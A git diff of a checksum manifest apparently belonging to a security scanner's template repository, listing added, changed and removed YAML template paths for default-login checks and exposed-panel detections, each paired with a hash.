+http/default-logins/trassir/trassir-default-login.yaml:852e8c9faa4f162b618b49e5bbc82c96eee1fcd5 +http/default-logins/umami/umami-default-login.yaml:550e79e191e378e0156054433a8eba144f14af74 +http/default-logins/versa/versa-default-login.yaml:2adcf0c6eccb4f40efe43ee4c88013c40dd55efc http/default-logins/versa/versa-flexvnf-default-login.yaml:92224e8992e29a5293cc87520d38934e48ae00d9 http/default-logins/vidyo/vidyo-default-login.yaml:a53cf852bbe93c8b705fabd787325df51a40540e http/default-logins/viewpoint/trilithic-viewpoint-login.yaml:b2ac62de9abb389d36bc589885915df27fa19ae5 @@ -2327,7 +2428,7 @@ http/default-logins/wildfly/wildfly-default-login.yaml:be9c0a68d24621f3571cb3c5a http/default-logins/wso2/wso2-default-login.yaml:c5dc4521a7f54962b5ec3bd81e929fb242e0ad2d http/default-logins/xerox/xerox7-default-login.yaml:d16a7c57cfcd0c565eb1c538f174ebf01f15a61e http/default-logins/xnat/xnat-default-login.yaml:7f7c0e6f5f5c74486cae5263a99b64e53282121c -http/default-logins/xui-weak-login.yaml:698ea48ffc2adbb447e1b0fc5d9f9990aba76966 +http/default-logins/xui-weak-login.yaml:26f0a9596993ae24c73e3fe74096215a78876bb3 http/default-logins/xxljob/xxljob-default-login.yaml:30a505f380ef9740d5809efe5ce4cac34a8a4202 http/default-logins/zabbix/zabbix-default-login.yaml:7e803be30efe1196ce3eeffede8e18562b63d9b4 http/default-logins/zmanda/zmanda-default-login.yaml:5243f9178079ff1fb4a508662d445a87b288bd1d @@ -2341,6 +2442,7 @@ http/exposed-panels/active-admin-exposure.yaml:3b0d26532cc84b64b34f24e07b07ccc35 http/exposed-panels/activemq-panel.yaml:ecb059ef7943b6f3696e6e537251093036970e20 http/exposed-panels/acunetix-login.yaml:d7a9cbeeb1f63a2a815fb8e09ab70a20bff43fef http/exposed-panels/acunetix-panel.yaml:1994de274df09e1cf81591e84bdf8daf4a65db13 +http/exposed-panels/addonfinance-portal.yaml:3912b0988b24985c9395cb8ca8eff40f74d5620e http/exposed-panels/adiscon-loganalyzer.yaml:cf77ab50d3dcd958b623c85fa89276a9629d4cd6 http/exposed-panels/adminer-panel-detect.yaml:37f68f54c4dc7db3e5cc6e19fae56b8df6e289c1 http/exposed-panels/adminer-panel.yaml:3ec476fd5da435dbd787146e1857df28c5a7bdfa @@ -2376,20 +2478,21 @@ http/exposed-panels/apache/public-tomcat-manager.yaml:6355ddbefbd1dcf0eb5749efc2 http/exposed-panels/apache-jmeter-dashboard.yaml:1c5baf4c173f8caed43633a08dd4bb448c03e8f4 http/exposed-panels/apiman-panel.yaml:3b944243ed9a33b724e01b8ffc9305ab27f407af http/exposed-panels/appsmith-web-login.yaml:bc361a3e4f6a021632ac1a8046f3538f27031603 -http/exposed-panels/appwrite-panel.yaml:b869bfe14ec9839948926736f660af4f91f29497 +http/exposed-panels/appwrite-panel.yaml:40dae5138e0278eb81207a973e23cac840698246 http/exposed-panels/aptus-panel.yaml:29b3f8d2e0b74c8e8b9f8d56fb423a1fc967352c http/exposed-panels/aqua-enterprise-panel.yaml:3cc8efaa89d82293c1f36c6c270953884f7fc8ff http/exposed-panels/arcgis/arcgis-panel.yaml:d3868325015954e4185168103932f7bf4351aa80 -http/exposed-panels/arcgis/arcgis-rest-api.yaml:f6d3d91c266e525e2d665211fdd44fc645a881eb -http/exposed-panels/arcgis/arcgis-services.yaml:ee1675bb0663e55d42336f17e95266273e50440f -http/exposed-panels/arcgis/arcgis-tokens.yaml:3b8b92d71debe847fff3a7c0b33883d81eaec449 +http/exposed-panels/arcgis/arcgis-rest-api.yaml:4d9a0f2ecb296da8faf516ddd36821beb0367e38 +http/exposed-panels/arcgis/arcgis-services.yaml:82ce551d279a9d6c531a18f099e2046f9e3594ea +http/exposed-panels/arcgis/arcgis-tokens.yaml:45cf23e074e3f7228b94416a19f8d1551fd4c664 http/exposed-panels/archibus-webcentral-panel.yaml:1387b64acd9b5192e4525d83db62f7ff4320852b http/exposed-panels/argocd-login.yaml:bdd490f67569902d8657a9f8453b22c507f5899d http/exposed-panels/arris-modem-detect.yaml:94c6ce3c19d48300dec93e609b27e8b5e2b0f529 -http/exposed-panels/aspect-control-panel.yaml:651a2e51c39ee1f1b5791924e30d76c1601b530b +http/exposed-panels/aspect-control-panel.yaml:4ef7859a7c920aac6f57066695c31a21f10ecd5a +http/exposed-panels/asus-aicloud-panel.yaml:eefcc5ae36061f8693e6ac587612690a796a2c29 http/exposed-panels/asus-router-panel.yaml:8ea7bcedfe52d29e4f0bba873c39fd3bd21920de http/exposed-panels/atlantis-detect.yaml:75f75e5d34df32dec3b57cfd441f6288123e8fc6 -http/exposed-panels/atlassian-crowd-panel.yaml:fa952a2cded7ae361d963e0d0f901122877f4f73 +http/exposed-panels/atlassian-crowd-panel.yaml:97ea8834eea624d69f18f42dc58febd9ed6ec7cf http/exposed-panels/atvise-login.yaml:3b4b9504f959a5ca4dbc871b4ab5934d93b72a00 http/exposed-panels/audiocodes-detect.yaml:53e96cf4dc36fba06baedfa924888a49f54b4afc http/exposed-panels/avantfax-panel.yaml:1a895c83b14699c7f7da33f606ae55b81044db9e @@ -2400,13 +2503,15 @@ http/exposed-panels/aviatrix-panel.yaml:3edb69e110d78955d07d909716156b7eedda5abe http/exposed-panels/avigilon-panel.yaml:4ba62f317d1197520015f6b2ffaa046c4f7dfb04 http/exposed-panels/avtech-avn801-camera-panel.yaml:d35d0a56835151f1ed24125618cb53c150975c1a http/exposed-panels/avtech-dvr-exposure.yaml:d6ed6635ca2472ff1c22d0f00cdcc2aaa67687f0 +http/exposed-panels/aws-ec2-autoscale.yaml:b76e95d24d6d4a0436f23be3bc4f28f3bb0b3ad1 http/exposed-panels/aws-opensearch-login.yaml:46536e274bff029c43e60fa4b38d2c1780eac172 http/exposed-panels/axel-webserver.yaml:0a2bb06cc9d4ae8a1a95982ee0723da93985e4b6 http/exposed-panels/axigen-webadmin.yaml:29bfef44e40fc7e4f8e07c32fe35e54e7bb18010 http/exposed-panels/axigen-webmail.yaml:ba82440c440e53659eb0177612f74e9b56e47494 -http/exposed-panels/axway-api-manager-panel.yaml:741f719815e4baf47ba7ac3b4d249239c15f69b1 -http/exposed-panels/axway-securetransport-panel.yaml:8e5436146f4e9a436639d462d09725e1e4a4fc0f +http/exposed-panels/axway-api-manager-panel.yaml:1ba4b61d383a8077d523a78e9f2c9943bbb50d45 +http/exposed-panels/axway-securetransport-panel.yaml:7cd833aab3b74c38091e333eaa55e98a17589c87 http/exposed-panels/axway-securetransport-webclient.yaml:0e612d5f82b17f9a730d35cc9cbc04bdadbcc9ba +http/exposed-panels/axxon-client-panel.yaml:ca59521f8b67ad16a73225efa8a3ce53ba885864 http/exposed-panels/azkaban-web-client.yaml:b0276712d02edf19eaf9e29ecf89454f2a082d89 http/exposed-panels/backpack/backpack-admin-panel.yaml:5644c872e82ca09f37a34023f8b8386a59fb0099 http/exposed-panels/barracuda-panel.yaml:652c3079815291186ad0caf04d453c8ff5fdcfd4 @@ -2431,11 +2536,14 @@ http/exposed-panels/bomgar-login-panel.yaml:e7ff6af9c5839acb61c4c67bb6fcea57af98 http/exposed-panels/bookstack-panel.yaml:5c4411b487396ba15c6fd72dc63aa7c62083b63b http/exposed-panels/buddy-panel.yaml:bab19682c24c4752a28fd22e16f8133a3672c542 http/exposed-panels/buildbot-panel.yaml:05ff5ee1c58065054a977e697e4b8e1cb9310d93 -http/exposed-panels/c2/cobalt-strike-c2.yaml:eb976da83183807c1f07de9ae35e941b9a820485 +http/exposed-panels/c2/brute-ratel-c4.yaml:447567d4f0e1196b2a2bde0818656fb90b88b57e http/exposed-panels/c2/covenant-c2.yaml:f025c38671d89902947f6bbae1fca4003ee419f4 http/exposed-panels/c2/deimos-c2.yaml:3716d444d35ef524aa1e2fa9d01d7fe231d9fe8a -http/exposed-panels/c2/metasploit-c2.yaml:4eb556b544c5adda049e118cb0dcde07e26c6f73 -http/exposed-panels/c2/mythic-c2.yaml:3e0c0287a96fc039a0e862d85fa53f6cc03312d7 +http/exposed-panels/c2/empire-c2.yaml:bdb641d0ba18bd25991dc88efdb258adb0bd3ac4 +http/exposed-panels/c2/evilginx.yaml:efdf2db2dc7b31fc2242f12654d189457fd08142 +http/exposed-panels/c2/mythic-c2.yaml:a02f3ff5c7d9372ef81dfc9a666727e5fab527f2 +http/exposed-panels/c2/nh-c2.yaml:4c2e40ce9f86b44749858f3b86d810c644ad1401 +http/exposed-panels/c2/viper-c2.yaml:a8f50bb1dd4884c0263704cf8276779afb5564c1 http/exposed-panels/cacti-panel.yaml:70b17ae1560874233ecbea0fd95a55b5b2e8cbfb http/exposed-panels/calendarix-panel.yaml:4e25ed8bc1632b96876a4fb3ef1d2b3a803c22b3 http/exposed-panels/call-break-cms.yaml:2d19e724de531b9e8607ae7c1123dcdacd4b8d52 @@ -2443,7 +2551,7 @@ http/exposed-panels/camunda-login-panel.yaml:aa4afca834d0bf65dc141208ad1035bfc95 http/exposed-panels/cas-login.yaml:914b954dcce75710915ee32f66ce8b4b33546669 http/exposed-panels/casdoor-login.yaml:473b3157712c0a6bea170f4eddc8fe35d645a74c http/exposed-panels/casemanager-panel.yaml:b29855847d1b818dea2fd4fd93496fd210031caf -http/exposed-panels/caton-network-manager-system.yaml:4043b91ab4f1d89e39548a311db9654b4b691e7b +http/exposed-panels/caton-network-manager-system.yaml:e020569d2106a0da04838355bd711ca95c88159e http/exposed-panels/ccm-detect.yaml:d6085394a02dd3dd90705551dbce7f8bdfcfaa35 http/exposed-panels/centreon-panel.yaml:f118376bf8e10c96fa7bb93c7576ebc6b480e896 http/exposed-panels/cerebro-panel.yaml:f7a827e8ad0f5800713d5f205517ab5b9bfc1acd @@ -2497,8 +2605,10 @@ http/exposed-panels/couchdb-fauxton.yaml:78e0165964da5864b093a69e3a0f50224c88813 http/exposed-panels/cpanel-api-codes.yaml:256eb94dcf2065470364d2530740f5cfaaef86f7 http/exposed-panels/craftcms-admin-panel.yaml:13aa643c72410e3c04caa627ce834101f2c7f5c8 http/exposed-panels/creatio-login-panel.yaml:a118be651a60a7f43df94e246db1dfb3572a0002 +http/exposed-panels/crontab-ui.yaml:d0eb80a754a6ad6f2a0b06dfbfef52d8890f9d9c http/exposed-panels/crush-ftp-login.yaml:e3ea9e9f76f02e3b4658e92aae6e1717aa8ba9d2 http/exposed-panels/crxde-lite.yaml:152ab7fcbf5cdb4b19dd7b92eeaee50a46bcb2e4 +http/exposed-panels/cryptobox-panel.yaml:c68dfe8a30b5ebb97ee6a48ae6b4023365ea75fe http/exposed-panels/csod-panel.yaml:592c630420d96bb7a43ec9c207d3fb2597fbdbf9 http/exposed-panels/cudatel-panel.yaml:152c3fad7cf985480b6c7de2f39cc37c464c4266 http/exposed-panels/cvent-panel-detect.yaml:1d69afc5bb623967c4e2e45611b27d50f6f76d7d @@ -2534,23 +2644,25 @@ http/exposed-panels/druid-console-exposure.yaml:52bb50b2b86c64947e93ade5e026aa1f http/exposed-panels/druid-panel.yaml:d9af1df3f6c57591f0c53ca97d49a4add445f771 http/exposed-panels/drupal-login.yaml:a0ab7c01e04a687031f25618fd9c84af0d28b184 http/exposed-panels/dynamicweb-panel.yaml:86f479df30aaf9a804c0029bf7c4ca759912d309 -http/exposed-panels/dynatrace-panel.yaml:a923ce1f8e42959ac1da38c4763c379b80f7940a +http/exposed-panels/dynatrace-panel.yaml:4e53bcf2b3f0e2c7bc0725aecf1b6a03b5c6b43f http/exposed-panels/dzzoffice/dzzoffice-install.yaml:6b41859a07f281e320b945ced149f9cd0d5dcf39 http/exposed-panels/dzzoffice/dzzoffice-panel.yaml:f7dc3bf43b62a7210b795e1aa074d69697575e6c http/exposed-panels/e-mobile-panel.yaml:99980114c50b18e82763b14b8295e2e8f807119f http/exposed-panels/eMerge-panel.yaml:e6b779ec85f6ea15d8490622f78307ba929d5b17 -http/exposed-panels/eclipse-birt-panel.yaml:32dda4f2f552e26d1145d8798185632e3f8e7a10 +http/exposed-panels/earcu-panel.yaml:4680b33172ce468b93eb9defa13bc3dc9bb50d9a +http/exposed-panels/eclipse-birt-panel.yaml:18b81d2ea0b3ab529dd65947a962b2b0ee7777e3 http/exposed-panels/ecosys-command-center.yaml:b03b6f6fc246a3f04b040213838a7fdee615f95c http/exposed-panels/edgeos-login.yaml:a374cabf07f76a5fa4775b2adf06293cfa4730b7 http/exposed-panels/eko-management-console-login.yaml:f6a17fdde102d3907652cead2d898c9d92522c3a http/exposed-panels/eko-software-update-panel.yaml:498ae0fbbb4b932746e1a10ccb2794d6f422f738 -http/exposed-panels/elemiz-network-manager.yaml:33602ee016b26022f692dee4e6f3b20138b965cc +http/exposed-panels/elemiz-network-manager.yaml:07ee55d78342df88368e93fb67b4b94402b2012b http/exposed-panels/emby-panel.yaml:c2061820ecf8e989362b19e59a84cf1ed53fe119 http/exposed-panels/emerson-power-panel.yaml:4b4fc09a5dfcd5c71195667700f53843d5b43b05 http/exposed-panels/emessage-panel.yaml:50c56e9e32ef8352c336f8a49ba947751096cb29 http/exposed-panels/ems-login-panel.yaml:8fbdffeaa41f8867b90354eb3961228f1b62c075 http/exposed-panels/ems-webclient-panel.yaml:d460ae303275b54f74a07dfdc0be37a5619ad275 http/exposed-panels/entrust-identityguard.yaml:b9af399a8dad97c9c0fa7f80f903bf5b7092847b +http/exposed-panels/eos-http-browser.yaml:86aaef7a82438cd9b2f30ca32af24cc0dc311c02 http/exposed-panels/episerver-panel.yaml:2bc9b6b40d5c771ae7ed2d153e6e7265ac4aa165 http/exposed-panels/epson-access-detect.yaml:e44720496080b335a7f6d3b441bd4ebb0ad23482 http/exposed-panels/epson-projector-detect.yaml:c2de8d1bdac7a6a9a5d5b18aa379c905500fe378 @@ -2587,17 +2699,17 @@ http/exposed-panels/forcepoint.yaml:4fd5c905dcdb6f3035f851cd0153c1f42ec60a00 http/exposed-panels/forti/fortiadc-panel.yaml:3fd75b6b9105818bfdac2b73365a237199552328 http/exposed-panels/fortinet/fortiap-panel.yaml:e4cb63caa54f0e48a13b78e6e7c823ddab8721d3 http/exposed-panels/fortinet/fortimail-panel.yaml:626fed49d49552e71e218a3ef4e3dfdd1c42b164 -http/exposed-panels/fortinet/fortinet-fortiddos-panel.yaml:7d28bf62db9892dbdfaabcc3ec162dfc080d4163 +http/exposed-panels/fortinet/fortinet-fortiddos-panel.yaml:723885be0dff5d6a7df0d6c47366ff1a60d8754a http/exposed-panels/fortinet/fortinet-fortigate-panel.yaml:9b2ec689fae5d881ceba8194ef29412ef65fc940 http/exposed-panels/fortinet/fortinet-fortimanager-panel.yaml:67ad2ffc8d1b6f5a14ddac0fa64d2da36c496a85 -http/exposed-panels/fortinet/fortinet-fortinac-panel.yaml:6fc7ce4730e1640ba66242a0f0b7ab768affafd6 -http/exposed-panels/fortinet/fortinet-panel.yaml:46aed29910699c0165a79daef6dcd6383f336068 +http/exposed-panels/fortinet/fortinet-fortinac-panel.yaml:23f23674c6b603e985216b69d35c4db87cacc32f +http/exposed-panels/fortinet/fortinet-panel.yaml:2ffdb3f8421917eca5533f70964dddd1e5ebca56 http/exposed-panels/fortinet/fortios-management-panel.yaml:136cc48261712da2b7e0aad4bd7e4bb7743ec3ff http/exposed-panels/fortinet/fortios-panel.yaml:fa41432320cf9dfdf8b6b2e1b9afa291137e23fe http/exposed-panels/fortinet/fortitester-login-panel.yaml:a3c332da54915833867c22a01d55273a5c62204a http/exposed-panels/fortinet/fortiweb-panel.yaml:4e34a17fbe2b3de6d1c61d22eee85dbc4818a741 -http/exposed-panels/freeipa-panel.yaml:2b713772480fd12b454a68facf04058202396e04 -http/exposed-panels/freepbx-administration-panel.yaml:57d3e0464b0a1b195fd30e5421540fe23b512730 +http/exposed-panels/freeipa-panel.yaml:c0b4b2f975d37b5a77e22771473a1a057bf43b91 +http/exposed-panels/freepbx-administration-panel.yaml:4ec2debb016a8c0c55af6138ab8855fbaea60766 http/exposed-panels/froxlor-management-panel.yaml:ef2476fa69e2c06e6f6e1e277d0c63f24b58f803 http/exposed-panels/ftm-manager-panel.yaml:7eff6dc7f05e380d6ef833e531a8473d689389db http/exposed-panels/fuelcms-panel.yaml:ed856951176ffb036b36e459fe2a37fab0bce587 @@ -2614,8 +2726,9 @@ http/exposed-panels/gitea-login.yaml:dd87faa7b04f24d2adba513ecc3fdf71f4b056bd http/exposed-panels/github-enterprise-detect.yaml:49dd35874870898425241db67d256a7f8724195b http/exposed-panels/gitlab-detect.yaml:dc313e3f5ec9d4dfb8acb111a7047625cb05d2d0 http/exposed-panels/globalprotect-panel.yaml:b93079cb0b53d6e62930b5375fb99d8568d58130 +http/exposed-panels/glowroot-panel.yaml:ef30e9d018ad881d623f5ca31d56098a2a364bd6 http/exposed-panels/glpi-panel.yaml:29c5d8c8bc35156251a5838a64b2495737d4c459 -http/exposed-panels/gnu-mailman.yaml:abeb8d7f21dce28fd29c1d5f313cf898c38c6a48 +http/exposed-panels/gnu-mailman.yaml:903e08b77037a25803f400a69bb6f51e4c1fcdc0 http/exposed-panels/go-anywhere-client.yaml:f9ad0f9b9cfbf590a73e8bf7f23896ee017dffb2 http/exposed-panels/goanywhere-mft-login.yaml:152e83f18129569470160a8d66cc2459fb26a10f http/exposed-panels/gocd-login.yaml:4d81a8f40c2e45cb6f3022e257cc5ee2a2222a31 @@ -2624,10 +2737,10 @@ http/exposed-panels/gogs-panel.yaml:a7d00efdb994a22be1b5c901624191abc093dae2 http/exposed-panels/gophish-login.yaml:5a6d89fec057a0603f0cbbcec9b2924bd641f6c0 http/exposed-panels/gradle/gradle-cache-node-detect.yaml:4f0449b3edcae32b63e5f5f04c3343ed53d912a2 http/exposed-panels/gradle/gradle-enterprise-panel.yaml:04dd111469ebeb05ca36e0b7a8d9696282bbf9c7 -http/exposed-panels/grafana-detect.yaml:e98769ecc3c312d9035242d30c814a333147e9bf +http/exposed-panels/grafana-detect.yaml:14c581ae57222e3698a24f9669c5ae1b8379f6f0 http/exposed-panels/grails-database-admin-console.yaml:fbe4781e9211b2132c52cbf8c7a37ad5e8b6ccf9 http/exposed-panels/graphite-browser.yaml:7ffb067e1ab2cb7e670f221db838615ebff01a60 -http/exposed-panels/group-ib-panel.yaml:7d5e09290e2aadaee457e16934436534b48ea469 +http/exposed-panels/group-ib-panel.yaml:803f784b144a69fafa114c4dcbda201ef6ce824b http/exposed-panels/gryphon-login.yaml:efbcf50251ce667da0c38297b30fb6ef474bd205 http/exposed-panels/gyra-master-admin.yaml:63917d1f1dbb08ea4737f99abebb178268b733e8 http/exposed-panels/h2console-panel.yaml:a7174e166bd4bc14f10162deffc42c09d2ae8fcd @@ -2636,7 +2749,7 @@ http/exposed-panels/hangfire-dashboard.yaml:c2acf2a76039ee7d6a90c9071fc1b862d2e7 http/exposed-panels/harbor-panel.yaml:3e670c20230c4b235f88b69d9cfb40336c9fb9c7 http/exposed-panels/hashicorp-consul-agent.yaml:f96f0c767b1e09916836f79d9f77dee06c8a6ab6 http/exposed-panels/hashicorp-consul-webgui.yaml:b15082211143beddea0e26bd2fa3de19a918369f -http/exposed-panels/hestia-panel.yaml:aac43ba3432a633092502cfd01a4e8f70b0d48b7 +http/exposed-panels/hestia-panel.yaml:1d7f9bb66a91637fe31767825865138d6cfb4bd1 http/exposed-panels/highmail-admin-panel.yaml:51b8d208dc75f09f36489a9ebf7e51195520f9ce http/exposed-panels/hitron-technologies.yaml:66f9be7e3e9a29fbdf700852d529f8e2fbcde6a4 http/exposed-panels/hivemanager-login-panel.yaml:27e1010d371715e0508abb6b2dda4635cc53176e @@ -2657,7 +2770,7 @@ http/exposed-panels/huawei-hg532e-panel.yaml:1f5152ee9bccd6f7d22bb5a16c0aab3cdb4 http/exposed-panels/hybris-administration-console.yaml:300ffe36a3e53febe3b40c18de48d510d5a004de http/exposed-panels/hydra-dashboard.yaml:19f0858ab4f3899fe86b1dd9dd75244664ad1d26 http/exposed-panels/hypertest-dashboard.yaml:068e77844c65e025a07387c122914affca77e065 -http/exposed-panels/i-mscp-panel.yaml:8f2ad3dbcfba1373f7bf79b8d905e2debaa70f1e +http/exposed-panels/i-mscp-panel.yaml:fb097bec9d4dcc9bc5b2ebff2a72137a6095a09e http/exposed-panels/ibm/ibm-advanced-system-management.yaml:70bbf83b381d4b557c13b63924fecc3c1c876030 http/exposed-panels/ibm/ibm-maximo-login.yaml:7237f4af7dc008713a126689fd7cfbb69177be9d http/exposed-panels/ibm/ibm-mqseries-web-console.yaml:7de4b80739fd0200baef5f8e441082dae7a0b4a2 @@ -2669,6 +2782,7 @@ http/exposed-panels/ibm/ibm-websphere-panel.yaml:e9fc97ec20e6fefae62e8e8b21fc94e http/exposed-panels/icc-pro-login.yaml:6bd4ddfda31583cba6c9ff9ff42f8114ab7d4d31 http/exposed-panels/icewarp-panel-detect.yaml:8ace79193f3e3903c8a3ce9df3b2688c9a2f8c8c http/exposed-panels/icinga-web-login.yaml:d79956f4fc7365f1f3ded1381b7b3eb4bcf9bcef +http/exposed-panels/iclock-admin-panel.yaml:067f6684a9184f1d8673037c0118a3cea3844180 http/exposed-panels/ictprotege-login-panel.yaml:5911682a4ffb2279b7ba2ba330d6840f6ca1a032 http/exposed-panels/identity-services-engine.yaml:13ae332607e3787fedaf84a2db0db8e2d71bf08c http/exposed-panels/ilch-admin-panel.yaml:d233b17ceb7e38334704adcf8209fd244820dc51 @@ -2679,11 +2793,11 @@ http/exposed-panels/intelbras-login.yaml:9a26fdaed2c19a3adb2abb8b2dbb431b9e3a7dc http/exposed-panels/intelbras-panel.yaml:ece053089f74133ce18ad05b260bb02a30c3a8ea http/exposed-panels/intellian-aptus-panel.yaml:a0ead38cd542c16d5f52aeecfb13dd206deb6736 http/exposed-panels/intelliflash-login-panel.yaml:d4d0f0e342c7c17c20bff43fd1ff3ec309bd2576 -http/exposed-panels/interactsoftware-interact.yaml:0e0a4855073dc9536e21cf3e721f4720740c38a6 +http/exposed-panels/interactsoftware-interact.yaml:b66db02e20627889f95f524167a0ba56a483bff4 http/exposed-panels/iomega-emc-shared-nas.yaml:0fc24f12cad6b18372d30edc1869b04fe31db7ae http/exposed-panels/ipdiva-mediation-panel.yaml:fc811cab9f9419319511acaa0d68e981340fb5e2 http/exposed-panels/iptime-router.yaml:7a9dbe904b1e1d794b8d342898071cfa7cbc73ff -http/exposed-panels/isams-panel.yaml:9f5f917847b8b92d4fe002179c8e395379e70a4a +http/exposed-panels/isams-panel.yaml:0335a68705c0c2868533fbc1cb5e4158ae4ba70a http/exposed-panels/issabel-login.yaml:1913c2663fea74afefd9f2d43177fe61201c078a http/exposed-panels/istat-panel-detect.yaml:61a81fcbd57588f0797ed87a20ee6215b3ab32f4 http/exposed-panels/itop-panel.yaml:d226833e3255b008807218390546b7133a8e2110 @@ -2693,20 +2807,20 @@ http/exposed-panels/jamf-login.yaml:38c5a40e2c5f6b48fa3dd82315944d4e574ea0bc http/exposed-panels/jamf-panel.yaml:d2e6a748980c16f5adb78a151b8b3ef433b2cdfb http/exposed-panels/jamf-setup-assistant.yaml:c1947d515daf9aeab5514f84fed32a62156b43c9 http/exposed-panels/jaspersoft-panel.yaml:ade5fe54e06e0b75706aafe48a4505b97d22a46f -http/exposed-panels/jboss/jboss-jbpm-admin.yaml:9d9b8b137369df491fb744d1520346e0454f3f1a +http/exposed-panels/jboss/jboss-jbpm-admin.yaml:1738603f40a4ef83585da160ef0dec8da62478a3 http/exposed-panels/jboss/jboss-juddi.yaml:f62d5c63dcd14ffe5e01a7434c91a83242e5f610 http/exposed-panels/jboss/jboss-soa-platform.yaml:605d4a52a1f89c347afccde5679e5fd413392a32 http/exposed-panels/jboss/jmx-console.yaml:ff929cbc6a7052c699e38fe57429c46c43f2c405 http/exposed-panels/jboss/wildfly-panel.yaml:2262775203773a99bb3c98db0776fff39a5377c8 http/exposed-panels/jcms-panel.yaml:c75446c621984ce3c42dce9f48ac964ca356be1e -http/exposed-panels/jedox-web-panel.yaml:0135b68f253701fb5ecde51cc811bf531075297e +http/exposed-panels/jedox-web-panel.yaml:75bbf9047508902ae064d42a6d60bb1b1f2b32ac http/exposed-panels/jeedom-panel.yaml:1d37029c4956f126233ecf43aa1211142fb20d8c http/exposed-panels/jenkins-api-panel.yaml:889cfedcc5df58ec420c12993a17c337cf55f702 http/exposed-panels/jenkins-login.yaml:5ada007081b1f6daf34ca4af7e334334ba406fb6 http/exposed-panels/jfrog-login.yaml:b591e393fb9183a2b85e0038cf3428d76a1f7b4a -http/exposed-panels/jira-detect.yaml:51b388ad60d0188102cb65186aed38d781a25283 http/exposed-panels/joget/joget-panel.yaml:c3c164fde8de3d0438c3f270c3099a64a9c85274 http/exposed-panels/joomla-panel.yaml:bf2b87bf46853ac01946895c77d1213e3ff19f45 +http/exposed-panels/jsherp-boot-panel.yaml:579e04ca2c497e3f1fbed58cc4a17376455a354f http/exposed-panels/jumpserver-panel.yaml:fd562432a15ec6de0ae4054f413ad64f56398a7b http/exposed-panels/jupyter-notebook.yaml:5e9417508e461b35381800fb11218414fb6e8023 http/exposed-panels/kafka-center-login.yaml:31ba92f2ce737a42dc2a9d1fc2275f61453197cf @@ -2734,11 +2848,11 @@ http/exposed-panels/kubernetes-dashboard.yaml:70774e6ff8b7a27744245d176cde742d6b http/exposed-panels/kubernetes-enterprise-manager.yaml:c4760462d613b677dbce6f290ba2d497e9ed6ffd http/exposed-panels/kubernetes-mirantis.yaml:a7c2800bad95565f3fd89578749e21677d157f85 http/exposed-panels/kubernetes-web-view.yaml:793d2abfff5b3ace93778ecf5da58783b5a66c83 -http/exposed-panels/kubeview-dashboard.yaml:96c517d5977ef551387204f624975fef9d9f71d5 +http/exposed-panels/kubeview-dashboard.yaml:b4e6293e012e9750656f3da75d35681979221f10 http/exposed-panels/labkey-server-login.yaml:af4be5b93511949dee4009f03c21fcfd70d970d8 http/exposed-panels/labtech-panel.yaml:e7e6d6799d556c0ef0ee447be405e31d8236e445 http/exposed-panels/lacie-panel.yaml:8da28ad6997282977c86178c8a10a5298ce3776e -http/exposed-panels/lancom-router-panel.yaml:fdcc454a331552e4aaf44c196592999b8479ee8c +http/exposed-panels/lancom-router-panel.yaml:cc570d1c0ac52bd007524e0c18021482c23661fe http/exposed-panels/landrayoa-panel.yaml:d93d71502c56b46857f3859d5935b232b6a514b1 http/exposed-panels/lansweeper-login.yaml:ad830ef8b2c4cee3740346c362810596ea344703 http/exposed-panels/lantronix-webmanager-panel.yaml:e15631b49b7120e62240d96d9b8576c09768b843 @@ -2765,7 +2879,7 @@ http/exposed-panels/maestro-login-panel.yaml:481c29a3ca12efccaa0ea758de239bfd5bd http/exposed-panels/mag-dashboard-panel.yaml:a981de9120e06988df4bde608a9696228c19d06f http/exposed-panels/magento-admin-panel.yaml:6de98dd07bb3171f43866a912dbb066a923d3744 http/exposed-panels/magento-downloader-panel.yaml:c44a4e7ce042cd3e32e8c95ec4e2f487a362b82d -http/exposed-panels/magnolia-panel.yaml:5c948f1adf603c77e45c751c5b222feb277a3a2e +http/exposed-panels/magnolia-panel.yaml:cf54de815884f9bec31455217096c54a0cfbe03c http/exposed-panels/mailhog-panel.yaml:f8b76a1c78cb9918d1afeb6eaa3572bf7711199c http/exposed-panels/mailwatch-login.yaml:d521f395baf43625ff6062f53371b0527385b0f6 http/exposed-panels/mantisbt-panel.yaml:fd9955feea4d45764389eee8c881ffb159f5fa1c @@ -2773,8 +2887,8 @@ http/exposed-panels/matomo-login-portal.yaml:8b90263221ca1a43a7b595469283828c3a3 http/exposed-panels/mautic-crm-panel.yaml:d6d009730c4d90630f9942fbddab7bf86cd6ed46 http/exposed-panels/meshcentral-login.yaml:3508dc05377d9ea80d5eedc0fa725beb5d3f9279 http/exposed-panels/metabase-panel.yaml:c8dfa427d7c63dd7de83ee2d65aece5b341fe783 -http/exposed-panels/metasploit-setup-page.yaml:f1e9f4249f0826fd753c87af41e98b8b65bd15b8 -http/exposed-panels/metersphere-login.yaml:418723a51dc130b640b5b5a425aa8c66b1b18974 +http/exposed-panels/metasploit-setup-page.yaml:91888e18de26aa01d904a794a0beef59614df507 +http/exposed-panels/metersphere-login.yaml:d37ff2ab529ee25dac1166d35bbfc7b2d4bf018b http/exposed-panels/mfiles-web-detect.yaml:1d53905330a0631c6d239a628f74fb25fcff9358 http/exposed-panels/microfocus-admin-server.yaml:206d58c717043599051341bfca66bdb18a97485d http/exposed-panels/microfocus-filr-panel.yaml:7c6dbf42b3791e09d6866a4729e38eaf7cf0c413 @@ -2785,6 +2899,7 @@ http/exposed-panels/mikrotik/mikrotik-routeros.yaml:ac4a9f5bbd915e4863ce52aa19b1 http/exposed-panels/mini-start-page.yaml:557c78979e68f333e149cad0b08ea663079069ed http/exposed-panels/minio-browser.yaml:951f07f2bf6cae489bf655eb3c4a7b155b76f08d http/exposed-panels/minio-console.yaml:89d3d3ad9fb8fc71028091e80d5f2208b005f474 +http/exposed-panels/misp-panel.yaml:020d1ef83cbe0a9c9794683dc487a453f6316042 http/exposed-panels/mitel-panel-detect.yaml:2c001705bb79dd6285fb8ad8c179cdfed28f3131 http/exposed-panels/mobile-management-panel.yaml:4692f6901212517dc5bff3716ab5cf171ddf20cc http/exposed-panels/mobileiron-login.yaml:f77611a7988ac16c7070af2f23506818837c841e @@ -2794,13 +2909,13 @@ http/exposed-panels/monitorix-exposure.yaml:5621eeb061e932973f179a15061f330d094f http/exposed-panels/monstra-admin-panel.yaml:9c8d8a27a02523ca82edb23b925c7f08cfcacf5c http/exposed-panels/movable-type-login.yaml:e839d412a5be34873f12b5cb0b96be4386832c7d http/exposed-panels/mpftvc-admin-panel.yaml:319d65fd657d09c60ec06206ef09e8c4ab7aa388 